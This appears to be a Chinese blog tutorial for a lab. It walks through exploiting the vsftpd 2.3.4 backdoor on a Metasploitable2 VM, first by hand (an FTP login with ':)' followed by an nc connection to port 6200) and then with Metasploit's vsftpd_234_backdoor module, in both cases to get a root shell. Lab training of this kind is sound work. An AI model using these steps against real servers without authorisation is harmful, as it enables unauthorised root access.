vsftpd_234_backdoor(笑脸漏洞)
攻击机和受害机的IP
kali: 192.168.75.130
Metasploitable2 - Linux: 192.168.75.128
方法一:
1.测试其流通性
2. 扫描受害机的服务信息
3. ftp连接受害机,用户名加上笑脸符号 :) 密码任意
注意(在输入密码回车后会有停顿,记住不要关闭ftp连接)
4. 此时扫描到受害机会反弹一个6200端口
5.使用 nc 连接会发现是root权限
笑脸漏洞利用成功.
如果上面的方法不会的话,下面介绍更简单的方法。
方法二:
打开msf框架
命令为:msfconsole
搜索笑脸漏洞
命令为: search vsftpd
使用改模块
命令为: use 0 或者 use exploit/unix/ftp/vsftpd_234_backdoor
设置攻击的受害机
命令为: set rhosts 192.168.75.128
运行该模块
命令为: run 或者 exploit
同样获取的也是root权限。
觉得对您有帮助的话,麻烦用您金贵的手点个赞吧!!!
觉得对您有帮助的话,麻烦用您金贵的手点个赞吧!!!
觉得对您有帮助的话,麻烦用您金贵的手点个赞吧!!!